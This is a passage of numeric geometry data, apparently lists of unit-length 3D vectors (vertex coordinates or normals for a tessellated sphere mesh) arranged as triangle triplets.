[-0.520354926586,0.44894811511,-0.726413309574],
[-0.485873311758,0.400663375854,-0.776785671711],
[-0.553625464439,0.378517180681,-0.74177056551],
[-0.379529476166,0.486395716667,-0.787004828453],
[-0.346611320972,0.436200261116,-0.830415487289],
[-0.416404157877,0.419940322638,-0.806385576725],
[-0.450116455555,0.352179646492,-0.820587992668],
[-0.413926929235,0.3044308424,-0.857896447182],
[-0.480284929276,0.284414708614,-0.829719662666],
[-0.416404157877,0.419940322638,-0.806385576725],
[-0.450116455555,0.352179646492,-0.820587992668],
[-0.485873311758,0.400663375854,-0.776785671711],
[-0.627150595188,0.171839639544,-0.759706020355],
[-0.588087081909,0.131048902869,-0.798110127449],
[-0.643326640129,0.108097285032,-0.757922053337],
[-0.506734728813,0.217834427953,-0.834127128124],
[-0.468421578407,0.174905076623,-0.866019308567],
[-0.529480218887,0.153434738517,-0.834331154823],
[-0.548688352108,0.091976031661,-0.830952167511],
[-0.509656965733,0.0549761541188,-0.858619451523],
[-0.564633131027,0.0339771322906,-0.82464236021],
[-0.529480218887,0.153434738517,-0.834331154823],
[-0.548688352108,0.091976031661,-0.830952167511],
[-0.588087081909,0.131048902869,-0.798110127449],
[-0.553625464439,0.378517180681,-0.74177056551],
[-0.582528710365,0.308011889458,-0.752189457417],
[-0.618283927441,0.353819847107,-0.701809465885],
[-0.480284929276,0.284414708614,-0.829719662666],
[-0.506734728813,0.217834427953,-0.834127128124],
[-0.545040607452,0.26241543889,-0.796284377575],
[-0.606988489628,0.238753452897,-0.757998526096],
[-0.627150595188,0.171839639544,-0.759706020355],
[-0.665048420429,0.213841319084,-0.715529501438],
[-0.545040607452,0.26241543889,-0.796284377575],
[-0.606988489628,0.238753452897,-0.757998526096],
[-0.582528710365,0.308011889458,-0.752189457417],
[-0.486395716667,0.787004828453,-0.379529476166],
[-0.535965919495,0.737060189247,-0.411682873964],
[-0.550243675709,0.762617051601,-0.340069264174],
[-0.44894811511,0.726413309574,-0.520354926586],
[-0.495975226164,0.669751524925,-0.552667617798],
[-0.517854511738,0.706037700176,-0.483050197363],
[-0.58378881216,0.680853009224,-0.44230055809],
[-0.628728508949,0.619044244289,-0.470621615648],
[-0.645450055599,0.65135627985,-0.398910075426],
[-0.517854511738,0.706037700176,-0.483050197363],
[-0.58378881216,0.680853009224,-0.44230055809],
[-0.535965919495,0.737060189247,-0.411682873964],
[-0.398910075426,0.645450055599,-0.65135627985],
[-0.44230055809,0.58378881216,-0.680853009224],
[-0.470621615648,0.628728508949,-0.619044244289],
[-0.340069264174,0.550243675709,-0.762617051601],
[-0.379529476166,0.486395716667,-0.787004828453],
[-0.411682873964,0.535965919495,-0.737060189247],
[-0.483050197363,0.517854511738,-0.706037700176],
[-0.520354926586,0.44894811511,-0.726413309574],
[-0.552667617798,0.495975226164,-0.669751524925],
[-0.411682873964,0.535965919495,-0.737060189247],
[-0.483050197363,0.517854511738,-0.706037700176],
[-0.44230055809,0.58378881216,-0.680853009224],
[-0.669751524925,0.552667617798,-0.495975226164],
[-0.706037700176,0.483050197363,-0.517854511738],
[-0.726413309574,0.520354926586,-0.44894811511],
[-0.619044244289,0.470621615648,-0.628728508949],
[-0.65135627985,0.398910075426,-0.645450055599],
[-0.680853009224,0.44230055809,-0.58378881216],
[-0.737060189247,0.411682873964,-0.535965919495],
[-0.762617051601,0.340069264174,-0.550243675709],
[-0.787004828453,0.379529476166,-0.486395716667],
[-0.680853009224,0.44230055809,-0.58378881216],
[-0.737060189247,0.411682873964,-0.535965919495],
[-0.706037700176,0.483050197363,-0.517854511738],
[-0.470621615648,0.628728508949,-0.619044244289],
[-0.540649950504,0.607478022575,-0.581951975822],
[-0.495975226164,0.669751524925,-0.552667617798],
[-0.552667617798,0.495975226164,-0.669751524925],
[-0.619044244289,0.470621615648,-0.628728508949],
[-0.581951975822,0.540649950504,-0.607478022575],
[-0.607478022575,0.581951975822,-0.540649950504],
[-0.669751524925,0.552667617798,-0.495975226164],
[-0.628728508949,0.619044244289,-0.470621615648],
[-0.581951975822,0.540649950504,-0.607478022575],
[-0.607478022575,0.581951975822,-0.540649950504],
[-0.540649950504,0.607478022575,-0.581951975822],
[0.475679844618,0.0,-0.8796184659],
[0.456712335348,0.0568443164229,-0.887796461582],
[0.509656965733,0.0549761541188,-0.858619451523],
[0.360324263573,0.0,-0.932827115059],
[0.334895044565,0.0602079555392,-0.940329909325],
[0.398431301117,0.0586068555713,-0.915323853493],
[0.434652328491,0.117213711143,-0.892938017845],
[0.409316182137,0.180623859167,-0.894335091114],
[0.468421578407,0.174905076623,-0.866019308567],
[0.398431301117,0.0586068555713,-0.915323853493],
[0.434652328491,0.117213711143,-0.892938017845],
[0.456712335348,0.0568443164229,-0.887796461582],
[0.225778326392,0.0,-0.974178731441],
[0.193714544177,0.0626873448491,-0.979053080082],
[0.266443610191,0.0615878328681,-0.961880862713],
[0.0770247355103,0.0,-0.997029185295],
[0.0394601933658,0.0638479366899,-0.997179210186],
[0.117650069296,0.0634539350867,-0.991025745869],
[0.158833146095,0.128498718143,-0.978907585144],
[0.121444880962,0.196501940489,-0.97295331955],
[0.199805602431,0.193975359201,-0.960443258286],
[0.117650069296,0.0634539350867,-0.991025745869],
[0.158833146095,0.128498718143,-0.978907585144],
[0.193714544177,0.0626873448491,-0.979053080082],
[0.380633711815,0.246351331472,-0.891307473183],
[0.348686188459,0.313436716795,-0.883275330067],
[0.413926929235,0.3044308424,-0.857896447182],
[0.239766731858,0.258633822203,-0.935745954514],
[0.202408134937,0.327503234148,-0.922915279865],
[0.277958005667,0.321246802807,-0.905284404755],
[0.313733518124,0.380723625422,-0.869839549065],
[0.276221334934,0.446935534477,-0.85085272789],
[0.346611320972,0.436200261116,-0.830415487289],
[0.277958005667,0.321246802807,-0.905284404755],
[0.313733518124,0.380723625422,-0.869839549065],
[0.348686188459,0.313436716795,-0.883275330067],
[0.266443610191,0.0615878328681,-0.961880862713],
[0.306287169456,0.123895764351,-0.943842172623],
[0.334895044565,0.0602079555392,-0.940329909325],
[0.199805602431,0.193975359201,-0.960443258286],
[0.239766731858,0.258633822203,-0.935745954514],
[0.274516820908,0.190361812711,-0.942551255226],
[0.34457308054,0.185843646526,-0.920180141926],
[0.380633711815,0.246351331472,-0.891307473183],
[0.409316182137,0.180623859167,-0.894335091114],
[0.274516820908,0.190361812711,-0.942551255226],
[0.34457308054,0.185843646526,-0.920180141926],
[0.306287169456,0.123895764351,-0.943842172623],
[-0.0770247355103,0.0,-0.997029185295],
[-0.117650069296,0.0634539350867,-0.991025745869],
[-0.0394601933658,0.0638479366899,-0.997179210186],
[-0.225778326392,0.0,-0.974178731441],
[-0.266443610191,0.0615878328681,-0.961880862713],
[-0.193714544177,0.0626873448491,-0.979053080082],
[-0.158833146095,0.128498718143,-0.978907585144],
[-0.199805602431,0.193975359201,-0.960443258286],
[-0.121444880962,0.196501940489,-0.97295331955],
[-0.193714544177,0.0626873448491,-0.979053080082],
[-0.158833146095,0.128498718143,-0.978907585144],
[-0.117650069296,0.0634539350867,-0.991025745869],
[-0.360324263573,0.0,-0.932827115059],
[-0.398431301117,0.0586068555713,-0.915323853493],
[-0.334895044565,0.0602079555392,-0.940329909325],
[-0.475679844618,0.0,-0.8796184659],
[-0.509656965733,0.0549761541188,-0.858619451523],
[-0.456712335348,0.0568443164229,-0.887796461582],
[-0.434652328491,0.117213711143,-0.892938017845],
[-0.468421578407,0.174905076623,-0.866019308567],
[-0.409316182137,0.180623859167,-0.894335091114],
[-0.456712335348,0.0568443164229,-0.887796461582],
[-0.434652328491,0.117213711143,-0.892938017845],
[-0.398431301117,0.0586068555713,-0.915323853493],
[-0.239766731858,0.258633822203,-0.935745954514],
[-0.277958005667,0.321246802807,-0.905284404755],
[-0.202408134937,0.327503234148,-0.922915279865],
[-0.380633711815,0.246351331472,-0.891307473183],
[-0.413926929235,0.3044308424,-0.857896447182],
[-0.348686188459,0.313436716795,-0.883275330067],
[-0.313733518124,0.380723625422,-0.869839549065],
[-0.346611320972,0.436200261116,-0.830415487289],
[-0.276221334934,0.446935534477,-0.85085272789],
[-0.348686188459,0.313436716795,-0.883275330067],
[-0.313733518124,0.380723625422,-0.869839549065],
[-0.277958005667,0.321246802807,-0.905284404755],
[-0.334895044565,0.0602079555392,-0.940329909325],
[-0.306287169456,0.123895764351,-0.943842172623],
[-0.266443610191,0.0615878328681,-0.961880862713],
[-0.409316182137,0.180623859167,-0.894335091114],
[-0.380633711815,0.246351331472,-0.891307473183],
[-0.34457308054,0.185843646526,-0.920180141926],
[-0.274516820908,0.190361812711,-0.942551255226],
[-0.239766731858,0.258633822203,-0.935745954514],
[-0.199805602431,0.193975359201,-0.960443258286],
[-0.34457308054,0.185843646526,-0.920180141926],
[-0.274516820908,0.190361812711,-0.942551255226],
[-0.306287169456,0.123895764351,-0.943842172623],
[0.236761152744,0.510783493519,-0.826465010643],
[0.196083456278,0.571085453033,-0.797127783298],
[0.269586592913,0.560828924179,-0.782811582088],
[0.0809632539749,0.524005174637,-0.847858190536],
[0.0399611219764,0.581926107407,-0.81225925684],
[0.119124859571,0.578244268894,-0.807120084763],
[0.154971644282,0.62687343359,-0.763553202152],
[0.114190116525,0.677466154099,-0.726636230946],
[0.188148602843,0.669747889042,-0.718357801437],
[0.119124859571,0.578244268894,-0.807120084763],
[0.154971644282,0.62687343359,-0.763553202152],
[0.196083456278,0.571085453033,-0.797127783298],
[-0.0809632539749,0.524005174637,-0.847858190536],
[-0.119124859571,0.578244268894,-0.807120084763],
[-0.0399611219764,0.581926107407,-0.81225925684],
[-0.236761152744,0.510783493519,-0.826465010643],
[-0.269586592913,0.560828924179,-0.782811582088],
[-0.196083456278,0.571085453033,-0.797127783298],
[-0.154971644282,0.62687343359,-0.763553202152],
[-0.188148602843,0.669747889042,-0.718357801437],
[-0.114190116525,0.677466154099,-0.726636230946],
[-0.196083456278,0.571085453033,-0.797127783298],
[-0.154971644282,0.62687343359,-0.763553202152],
[-0.119124859571,0.578244268894,-0.807120084763],
[0.0744211226702,0.722495436668,-0.687358558178],
[0.0362210273743,0.761889100075,-0.646693944931],
[0.108097285032,0.757922053337,-0.643326640129],
[-0.0744211226702,0.722495436668,-0.687358558178],
[-0.108097285032,0.757922053337,-0.643326640129],
[-0.0362210273743,0.761889100075,-0.646693944931],
[0.0,0.79582041502,-0.605532705784],
[-0.0339771322906,0.82464236021,-0.564633131027],
[0.0339771322906,0.82464236021,-0.564633131027],
[-0.0362210273743,0.761889100075,-0.646693944931],
[0.0,0.79582041502,-0.605532705784],
[0.0362210273743,0.761889100075,-0.646693944931],
[-0.0399611219764,0.581926107407,-0.81225925684],
[0.0,0.634539365768,-0.772890508175],
[0.0399611219764,0.581926107407,-0.81225925684],
[-0.114190116525,0.677466154099,-0.726636230946],
[-0.0744211226702,0.722495436668,-0.687358558178],
[-0.0382858961821,0.68142670393,-0.730884253979],
[0.0382858961821,0.68142670393,-0.730884253979],
[0.0744211226702,0.722495436668,-0.687358558178],
[0.114190116525,0.677466154099,-0.726636230946],
[-0.0382858961821,0.68142670393,-0.730884253979],
[0.0382858961821,0.68142670393,-0.730884253979],
[0.0,0.634539365768,-0.772890508175],
[-0.0394601933658,0.0638479366899,-0.997179210186],
[0.0,0.130150929093,-0.991494178772],
[0.0394601933658,0.0638479366899,-0.997179210186],
[-0.121444880962,0.196501940489,-0.97295331955],
[-0.0820460245013,0.265506535769,-0.960611641407],
[-0.0407496243715,0.197802826762,-0.979394435883],
[0.0407496243715,0.197802826762,-0.979394435883],
[0.0820460245013,0.265506535769,-0.960611641407],
[0.121444880962,0.196501940489,-0.97295331955],
[-0.0407496243715,0.197802826762,-0.979394435883],
[0.0407496243715,0.197802826762,-0.979394435883],
[0.0,0.130150929093,-0.991494178772],
[-0.202408134937,0.327503234148,-0.922915279865],
[-0.162998497486,0.395605653524,-0.903840482235],
[-0.123069040477,0.33188316226,-0.935258030891],
[-0.276221334934,0.446935534477,-0.85085272789],
[-0.236761152744,0.510783493519,-0.826465010643],
[-0.20109423995,0.455528259277,-0.867211103439],
[-0.122248865664,0.461539924145,-0.878655850887],
[-0.0809632539749,0.524005174637,-0.847858190536],
[-0.0410230122507,0.464636415243,-0.88455080986],
[-0.20109423995,0.455528259277,-0.867211103439],
[-0.122248865664,0.461539924145,-0.878655850887],
[-0.162998497486,0.395605653524,-0.903840482235],
[0.123069040477,0.33188316226,-0.935258030891],
[0.162998497486,0.395605653524,-0.903840482235],
[0.202408134937,0.327503234148,-0.922915279865],
[0.0410230122507,0.464636415243,-0.88455080986],
[0.0809632539749,0.524005174637,-0.847858190536],
[0.122248865664,0.461539924145,-0.878655850887],
[0.20109423995,0.455528259277,-0.867211103439],
[0.236761152744,0.510783493519,-0.826465010643],
[0.276221334934,0.446935534477,-0.85085272789],
[0.122248865664,0.461539924145,-0.878655850887],
[0.20109423995,0.455528259277,-0.867211103439],
[0.162998497486,0.395605653524,-0.903840482235],
[-0.123069040477,0.33188316226,-0.935258030891],
[-0.04130198434,0.334140062332,-0.941618084908],
[-0.0820460245013,0.265506535769,-0.960611641407],
[-0.0410230122507,0.464636415243,-0.88455080986],
[0.0410230122507,0.464636415243,-0.88455080986],
[0.0,0.400968074799,-0.916092038155],
[0.04130198434,0.334140062332,-0.941618084908],
[0.123069040477,0.33188316226,-0.935258030891],
[0.0820460245013,0.265506535769,-0.960611641407],
[0.0,0.400968074799,-0.916092038155],
[0.04130198434,0.334140062332,-0.941618084908],
[-0.04130198434,0.334140062332,-0.941618084908],
[0.509656965733,0.0549761541188,-0.858619451523],
[0.548688352108,0.091976031661,-0.830952167511],
[0.564633131027,0.0339771322906,-0.82464236021],
[0.468421578407,0.174905076623,-0.866019308567],
[0.506734728813,0.217834427953,-0.834127128124],
[0.529480218887,0.153434738517,-0.834331154823],
[0.588087081909,0.131048902869,-0.798110127449],
[0.627150595188,0.171839639544,-0.759706020355],
[0.643326640129,0.108097285032,-0.757922053337],
[0.529480218887,0.153434738517,-0.834331154823],
[0.588087081909,0.131048902869,-0.798110127449],
[0.548688352108,0.091976031661,-0.830952167511],
[0.413926929235,0.3044308424,-0.857896447182],
[0.450116455555,0.352179646492,-0.820587992668],
[0.480284929276,0.284414708614,-0.829719662666],
[0.346611320972,0.436200261116,-0.830415487289],
[0.379529476166,0.486395716667,-0.787004828453],
[0.416404157877,0.419940322638,-0.806385576725],
[0.485873311758,0.400663375854,-0.776785671711],
[0.520354926586,0.44894811511,-0.726413309574],
[0.553625464439,0.378517180681,-0.74177056551],
[0.416404157877,0.419940322638,-0.806385576725],
[0.485873311758,0.400663375854,-0.776785671711],
[0.450116455555,0.352179646492,-0.820587992668],
[0.665048420429,0.213841319084,-0.715529501438],
[0.700865805149,0.256401896477,-0.665616393089],
[0.718357801437,0.188148602843,-0.669747889042],
[0.618283927441,0.353819847107,-0.701809465885],
[0.65135627985,0.398910075426,-0.645450055599],
[0.678621411324,0.327040165663,-0.657660841942],
[0.733673810959,0.298754066229,-0.610302150249],
[0.762617051601,0.340069264174,-0.550243675709],
[0.782811582088,0.269586592913,-0.560828924179],
[0.678621411324,0.327040165663,-0.657660841942],
[0.733673810959,0.298754066229,-0.610302150249],
[0.700865805149,0.256401896477,-0.665616393089],
[0.480284929276,0.284414708614,-0.829719662666],
[0.545040607452,0.26241543889,-0.796284377575],
[0.506734728813,0.217834427953,-0.834127128124],
[0.553625464439,0.378517180681,-0.74177056551],
[0.618283927441,0.353819847107,-0.701809465885],
[0.582528710365,0.308011889458,-0.752189457417],
[0.606988489628,0.238753452897,-0.757998526096],
[0.665048420429,0.213841319084,-0.715529501438],
[0.627150595188,0.171839639544,-0.759706020355],
[0.582528710365,0.308011889458,-0.752189457417],
[0.606988489628,0.238753452897,-0.757998526096],
[0.545040607452,0.26241543889,-0.796284377575],
[0.269586592913,0.560828924179,-0.782811582088],
[0.298754066229,0.610302150249,-0.733673810959],
[0.340069264174,0.550243675709,-0.762617051601],
[0.188148602843,0.669747889042,-0.718357801437],
[0.213841319084,0.715529501438,-0.665048420429],
[0.256401896477,0.665616393089,-0.700865805149],
[0.327040165663,0.657660841942,-0.678621411324],
[0.353819847107,0.701809465885,-0.618283927441],
[0.398910075426,0.645450055599,-0.65135627985],
[0.256401896477,0.665616393089,-0.700865805149],
[0.327040165663,0.657660841942,-0.678621411324],
[0.298754066229,0.610302150249,-0.733673810959],
[0.108097285032,0.757922053337,-0.643326640129],
[0.131048902869,0.798110127449,-0.588087081909],
[0.171839639544,0.759706020355,-0.627150595188],
[0.0339771322906,0.82464236021,-0.564633131027],
[0.0549761541188,0.858619451523,-0.509656965733],
[0.091976031661,0.830952167511,-0.548688352108],
[0.153434738517,0.834331154823,-0.529480218887],
[0.174905076623,0.866019308567,-0.468421578407],
[0.217834427953,0.834127128124,-0.506734728813],
[0.091976031661,0.830952167511,-0.548688352108],
[0.153434738517,0.834331154823,-0.529480218887],
[0.131048902869,0.798110127449,-0.588087081909],
[0.378517180681,0.74177056551,-0.553625464439],
[0.400663375854,0.776785671711,-0.485873311758],
[0.44894811511,0.726413309574,-0.520354926586],
[0.284414708614,0.829719662666,-0.480284929276],
[0.3044308424,0.857896447182,-0.413926929235],
[0.352179646492,0.820587992668,-0.450116455555],
[0.419940322638,0.806385576725,-0.416404157877],
[0.436200261116,0.830415487289,-0.346611320972],
[0.486395716667,0.787004828453,-0.379529476166],
[0.352179646492,0.820587992668,-0.450116455555],
[0.419940322638,0.806385576725,-0.416404157877],
[0.400663375854,0.776785671711,-0.485873311758],
[0.171839639544,0.759706020355,-0.627150595188],
[0.238753452897,0.757998526096,-0.606988489628],
[0.213841319084,0.715529501438,-0.665048420429],
[0.217834427953,0.834127128124,-0.506734728813],
[0.284414708614,0.829719662666,-0.480284929276],
[0.26241543889,0.796284377575,-0.545040607452],
[0.308011889458,0.752189457417,-0.582528710365],
[0.378517180681,0.74177056551,-0.553625464439],
[0.353819847107,0.701809465885,-0.618283927441],
[0.26241543889,0.796284377575,-0.545040607452],
[0.308011889458,0.752189457417,-0.582528710365],
[0.238753452897,0.757998526096,-0.606988489628],
[0.787004828453,0.379529476166,-0.486395716667],
[0.806385576725,0.416404157877,-0.419940322638],
[0.830415487289,0.346611320972,-0.436200261116],
[0.726413309574,0.520354926586,-0.44894811511],
[0.74177056551,0.553625464439,-0.378517180681],
[0.776785671711,0.485873311758,-0.400663375854],
[0.820587992668,0.450116455555,-0.352179646492],
[0.829719662666,0.480284929276,-0.284414708614],
[0.857896447182,0.413926929235,-0.3044308424],
[0.776785671711,0.485873311758,-0.400663375854],
[0.820587992668,0.450116455555,-0.352179646492],
[0.806385576725,0.416404157877,-0.419940322638],
[0.645450055599,0.65135627985,-0.398910075426],
[0.657660841942,0.678621411324,-0.327040165663],
[0.701809465885,0.618283927441,-0.353819847107],
[0.550243675709,0.762617051601,-0.340069264174],
[0.560828924179,0.782811582088,-0.269586592913],
[0.610302150249,0.733673810959,-0.298754066229],
[0.665616393089,0.700865805149,-0.256401896477],
[0.669747889042,0.718357801437,-0.188148602843],
[0.715529501438,0.665048420429,-0.213841319084],
[0.610302150249,0.733673810959,-0.298754066229],
[0.665616393089,0.700865805149,-0.256401896477],
[0.657660841942,0.678621411324,-0.327040165663],
[0.834127128124,0.506734728813,-0.217834427953],
[0.834331154823,0.529480218887,-0.153434738517],
[0.866019308567,0.468421578407,-0.174905076623],
[0.759706020355,0.627150595188,-0.171839639544],
[0.757922053337,0.643326640129,-0.108097285032],
[0.798110127449,0.588087081909,-0.131048902869],
[0.830952167511,0.548688352108,-0.091976031661],
[0.82464236021,0.564633131027,-0.0339771322906],
[0.858619451523,0.509656965733,-0.0549761541188],
[0.798110127449,0.588087081909,-0.131048902869],
[0.830952167511,0.548688352108,-0.091976031661],
[0.834331154823,0.529480218887,-0.153434738517],
[0.701809465885,0.618283927441,-0.353819847107],
[0.752189457417,0.582528710365,-0.308011889458],
[0.74177056551,0.553625464439,-0.378517180681],
[0.715529501438,0.665048420429,-0.213841319084],
[0.759706020355,0.627150595188,-0.171839639544],
[0.757998526096,0.606988489628,-0.238753452897],
[0.796284377575,0.545040607452,-0.26241543889],
[0.834127128124,0.506734728813,-0.217834427953],
[0.829719662666,0.480284929276,-0.284414708614],
[0.757998526096,0.606988489628,-0.238753452897],
[0.796284377575,0.545040607452,-0.26241543889],
[0.752189457417,0.582528710365,-0.308011889458],
[0.340069264174,0.550243675709,-0.762617051601],
[0.411682873964,0.535965919495,-0.737060189247],
[0.379529476166,0.486395716667,-0.787004828453],
[0.398910075426,0.645450055599,-0.65135627985],
[0.470621615648,0.628728508949,-0.619044244289],
[0.44230055809,0.58378881216,-0.680853009224],
[0.483050197363,0.517854511738,-0.706037700176],
[0.552667617798,0.495975226164,-0.669751524925],
[0.520354926586,0.44894811511,-0.726413309574],
[0.44230055809,0.58378881216,-0.680853009224],
[0.483050197363,0.517854511738,-0.706037700176],
[0.411682873964,0.535965919495,-0.737060189247],
[0.44894811511,0.726413309574,-0.520354926586],
[0.517854511738,0.706037700176,-0.483050197363],
[0.495975226164,0.669751524925,-0.552667617798],
[0.486395716667,0.787004828453,-0.379529476166],
[0.550243675709,0.762617051601,-0.340069264174],
[0.535965919495,0.737060189247,-0.411682873964],
[0.58378881216,0.680853009224,-0.44230055809],
[0.645450055599,0.65135627985,-0.398910075426],
[0.628728508949,0.619044244289,-0.470621615648],
[0.535965919495,0.737060189247,-0.411682873964],
[0.58378881216,0.680853009224,-0.44230055809],
[0.517854511738,0.706037700176,-0.483050197363],
[0.619044244289,0.470621615648,-0.628728508949],
[0.680853009224,0.44230055809,-0.58378881216],
[0.65135627985,0.398910075426,-0.645450055599],
[0.669751524925,0.552667617798,-0.495975226164],
[0.726413309574,0.520354926586,-0.44894811511],
[0.706037700176,0.483050197363,-0.517854511738],
[0.737060189247,0.411682873964,-0.535965919495],
[0.787004828453,0.379529476166,-0.486395716667],
[0.762617051601,0.340069264174,-0.550243675709],
[0.706037700176,0.483050197363,-0.517854511738],
[0.737060189247,0.411682873964,-0.535965919495],
[0.680853009224,0.44230055809,-0.58378881216],
[0.495975226164,0.669751524925,-0.552667617798],
[0.540649950504,0.607478022575,-0.581951975822],
[0.470621615648,0.628728508949,-0.619044244289],
[0.628728508949,0.619044244289,-0.470621615648],
[0.669751524925,0.552667617798,-0.495975226164],
[0.607478022575,0.581951975822,-0.540649950504],
[0.581951975822,0.540649950504,-0.607478022575],
[0.619044244289,0.470621615648,-0.628728508949],
[0.552667617798,0.495975226164,-0.669751524925],
[0.607478022575,0.581951975822,-0.540649950504],
[0.581951975822,0.540649950504,-0.607478022575],
[0.540649950504,0.607478022575,-0.581951975822],
[0.82464236021,0.564633131027,-0.0339771322906],
[0.79582041502,0.605532705784,0.0],
[0.82464236021,0.564633131027,0.0339771322906],
[0.757922053337,0.643326640129,-0.108097285032],
[0.722495436668,0.687358558178,-0.0744211226702],
[0.761889100075,0.646693944931,-0.0362210273743],
[0.761889100075,0.646693944931,0.0362210273743],
[0.722495436668,0.687358558178,0.0744211226702],
[0.757922053337,0.643326640129,0.108097285032],
[0.761889100075,0.646693944931,-0.0362210273743],
[0.761889100075,0.646693944931,0.0362210273743],
[0.79582041502,0.605532705784,0.0],
[0.669747889042,0.718357801437,-0.188148602843],
[0.62687343359,0.763553202152,-0.154971644282],
[0.677466154099,0.726636230946,-0.114190116525],
[0.560828924179,0.782811582088,-0.269586592913],
[0.510783493519,0.826465010643,-0.236761152744],
[0.571085453033,0.797127783298,-0.196083456278],
[0.578244268894,0.807120084763,-0.119124859571],
[0.524005174637,0.847858190536,-0.0809632539749],
[0.581926107407,0.81225925684,-0.0399611219764],
[0.571085453033,0.797127783298,-0.196083456278],
[0.578244268894,0.807120084763,-0.119124859571],
[0.62687343359,0.763553202152,-0.154971644282],
[0.677466154099,0.726636230946,0.114190116525],
[0.62687343359,0.763553202152,0.154971644282],
[0.669747889042,0.718357801437,0.188148602843],
[0.581926107407,0.81225925684,0.0399611219764],
[0.524005174637,0.847858190536,0.0809632539749],
[0.578244268894,0.807120084763,0.119124859571],
[0.571085453033,0.797127783298,0.196083456278],
[0.510783493519,0.826465010643,0.236761152744],
[0.560828924179,0.782811582088,0.269586592913],
[0.578244268894,0.807120084763,0.119124859571],
[0.571085453033,0.797127783298,0.196083456278],
[0.62687343359,0.763553202152,0.154971644282],
[0.677466154099,0.726636230946,-0.114190116525],
[0.68142670393,0.730884253979,-0.0382858961821],
[0.722495436668,0.687358558178,-0.0744211226702],
[0.581926107407,0.81225925684,-0.0399611219764],
[0.581926107407,0.81225925684,0.0399611219764],
[0.634539365768,0.772890508175,0.0],
[0.68142670393,0.730884253979,0.0382858961821],
[0.677466154099,0.726636230946,0.114190116525],
[0.722495436668,0.687358558178,0.0744211226702],
[0.634539365768,0.772890508175,0.0],
[0.68142670393,0.730884253979,0.0382858961821],
[0.68142670393,0.730884253979,-0.0382858961821],
[0.436200261116,0.830415487289,-0.346611320972],
[0.380723625422,0.869839549065,-0.313733518124],
[0.446935534477,0.85085272789,-0.276221334934],
[0.3044308424,0.857896447182,-0.413926929235],
[0.246351331472,0.891307473183,-0.380633711815],
[0.313436716795,0.883275330067,-0.348686188459],
[0.321246802807,0.905284404755,-0.277958005667],
[0.258633822203,0.935745954514,-0.239766731858],
[0.327503234148,0.922915279865,-0.202408134937],
[0.313436716795,0.883275330067,-0.348686188459],
[0.321246802807,0.905284404755,-0.277958005667],
[0.380723625422,0.869839549065,-0.313733518124],
[0.174905076623,0.866019308567,-0.468421578407],
[0.117213711143,0.892938017845,-0.434652328491],
[0.180623859167,0.894335091114,-0.409316182137],
[0.0549761541188,0.858619451523,-0.509656965733],
[0.0,0.8796184659,-0.475679844618],
[0.0568443164229,0.887796461582,-0.456712335348],
[0.0586068555713,0.915323853493,-0.398431301117],
[0.0,0.932827115059,-0.360324263573],
[0.0602079555392,0.940329909325,-0.334895044565],
[0.0568443164229,0.887796461582,-0.456712335348],
[0.0586068555713,0.915323853493,-0.398431301117],
[0.117213711143,0.892938017845,-0.434652328491],
[0.193975359201,0.960443258286,-0.199805602431],
[0.128498718143,0.978907585144,-0.158833146095],
[0.196501940489,0.97295331955,-0.121444880962],
[0.0615878328681,0.961880862713,-0.266443610191],
[0.0,0.974178731441,-0.225778326392],
[0.0626873448491,0.979053080082,-0.193714544177],
[0.0634539350867,0.991025745869,-0.117650069296],
[0.0,0.997029185295,-0.0770247355103],
[0.0638479366899,0.997179210186,-0.0394601933658],
[0.0626873448491,0.979053080082,-0.193714544177],
[0.0634539350867,0.991025745869,-0.117650069296],
[0.128498718143,0.978907585144,-0.158833146095],
[0.180623859167,0.894335091114,-0.409316182137],
[0.185843646526,0.920180141926,-0.34457308054],
[0.246351331472,0.891307473183,-0.380633711815],
[0.0602079555392,0.940329909325,-0.334895044565],
[0.0615878328681,0.961880862713,-0.266443610191],
[0.123895764351,0.943842172623,-0.306287169456],
[0.190361812711,0.942551255226,-0.274516820908],
[0.193975359201,0.960443258286,-0.199805602431],
[0.258633822203,0.935745954514,-0.239766731858],
[0.123895764351,0.943842172623,-0.306287169456],
[0.190361812711,0.942551255226,-0.274516820908],
[0.185843646526,0.920180141926,-0.34457308054],
[0.446935534477,0.85085272789,0.276221334934],
[0.380723625422,0.869839549065,0.313733518124],
[0.436200261116,0.830415487289,0.346611320972],
[0.327503234148,0.922915279865,0.202408134937],
[0.258633822203,0.935745954514,0.239766731858],
[0.321246802807,0.905284404755,0.277958005667],
[0.313436716795,0.883275330067,0.348686188459],
[0.246351331472,0.891307473183,0.380633711815],
[0.3044308424,0.857896447182,0.413926929235],
[0.321246802807,0.905284404755,0.277958005667],
[0.313436716795,0.883275330067,0.348686188459],
[0.380723625422,0.869839549065,0.313733518124],
[0.196501940489,0.97295331955,0.121444880962],
[0.128498718143,0.978907585144,0.158833146095],
[0.193975359201,0.960443258286,0.199805602431],
[0.0638479366899,0.997179210186,0.0394601933658],
[0.0,0.997029185295,0.0770247355103],
[0.0634539350867,0.991025745869,0.117650069296],
[0.0626873448491,0.979053080082,0.193714544177],
[0.0,0.974178731441,0.225778326392],
[0.0615878328681,0.961880862713,0.266443610191],
[0.0634539350867,0.991025745869,0.117650069296],
[0.0626873448491,0.979053080082,0.193714544177],
[0.128498718143,0.978907585144,0.158833146095],
[0.180623859167,0.894335091114,0.409316182137],
[0.117213711143,0.892938017845,0.434652328491],
[0.174905076623,0.866019308567,0.468421578407],
[0.0602079555392,0.940329909325,0.334895044565],
[0.0,0.932827115059,0.360324263573],
[0.0586068555713,0.915323853493,0.398431301117],
[0.0568443164229,0.887796461582,0.456712335348],
[0.0,0.8796184659,0.475679844618],
[0.0549761541188,0.858619451523,0.509656965733],
[0.0586068555713,0.915323853493,0.398431301117],
[0.0568443164229,0.887796461582,0.456712335348],
[0.117213711143,0.892938017845,0.434652328491],
[0.193975359201,0.960443258286,0.199805602431],
[0.190361812711,0.942551255226,0.274516820908],
[0.258633822203,0.935745954514,0.239766731858],
[0.0615878328681,0.961880862713,0.266443610191],
[0.0602079555392,0.940329909325,0.334895044565],
[0.123895764351,0.943842172623,0.306287169456],
[0.185843646526,0.920180141926,0.34457308054],
[0.180623859167,0.894335091114,0.409316182137],
[0.246351331472,0.891307473183,0.380633711815],
[0.123895764351,0.943842172623,0.306287169456],
[0.185843646526,0.920180141926,0.34457308054],
[0.190361812711,0.942551255226,0.274516820908],
[0.446935534477,0.85085272789,-0.276221334934],
[0.455528259277,0.867211103439,-0.20109423995],
[0.510783493519,0.826465010643,-0.236761152744],
[0.327503234148,0.922915279865,-0.202408134937],
[0.33188316226,0.935258030891,-0.123069040477],
[0.395605653524,0.903840482235,-0.162998497486],
